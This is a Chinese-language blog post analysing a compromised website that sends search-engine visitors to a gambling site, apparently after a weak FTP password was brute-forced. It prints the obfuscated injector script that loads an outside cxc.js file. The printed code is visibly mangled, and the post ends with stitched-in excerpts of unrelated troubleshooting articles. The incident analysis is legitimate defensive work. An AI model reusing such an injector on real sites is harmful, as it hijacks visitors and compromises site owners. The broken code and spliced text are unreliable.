收到訊息後我嘗試操作並收集到下面現象內容:
開始排查
[博彩站]
先開啟站點www.***.com返回code=200,不是服務端重定向code=302,是由前端發起跳轉,並且注意到:cxc.js,請求頭referer=www.***.com,這個並非站點前端開發需要引入的指令碼,開啟位址看**如下:
(function () ;if(!''.replace(/^/,string))];e=function();c=1;};while(c--)if(k[c])p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))明了了,就是這段指令碼把cxc.js動態的引入到站點裡,現在跳轉的原因是找到了,但是為啥會好端端的多了這段**,繼續後面的分析
站點是通過阿里雲伺服器的虛擬空間進行部署的,伺服器本身應該沒有問題
目前猜測有兩種可能性:
ftp暴力破解,成功連線上ftp後進行篡改
站點安全漏洞,被上傳了木馬程式後被執行,篡改了原始碼
後面問了下ftp密碼是設定的挺簡單的,所以評估可能是ftp暴力破解導致,細思極恐
問題總結:
通過抓包和**分析可以知道跳轉到博彩站的流程是這樣的:
開啟首頁,指令碼執行了evel(混淆加密壓縮),動態引入cxc.js
引入的cxc.js裡執行了(function ())(),如果站點referrer是搜尋引擎過來的就跳轉到博彩站,不是就不做跳轉直接正常開啟站點
知道原理後就很清晰明白上面現象的原因,並且可以很清楚的怎麼去修復
站點原始碼被侵入篡改問題:
記一次線上問題排查
這次線上問題來的比較突然,影響也大,用部落格記錄下整個過程,也當作是對這次事故的一次總結歸納。day1 2018年06月21號上午10點,收到運營同事通知,http com api 訪問量劇增,日誌量達到80g 天,而且有上公升趨勢。運營同事讓我們排查,這種訪問是否正常。運營統計訪問量 收到通知後立...
記一次問題排查心得
平時程式執行的好好的,昨天收到一則使用者上報,在xp系統下面,程式啟動後彈出 應用程式正常初始化 0xc0150002 失敗,請單擊確定,終止應用程式 遇到這個問題後,在自己的xp虛擬機器裡面呼叫一把,果然也出現這個問題,接下來記錄解決這個問題的全過程。然後就是各種安裝 解除安裝 檢測組合情況,最後...
記一次React線上問題排查
昨天運營報了乙個問題,之前一直正常執行的react專案突然頁面訪問不了了,通過排查發現頁面報錯了,錯誤如下 uncaught typeerror failed to set an indexed property on cssstyledeclaration index property sette...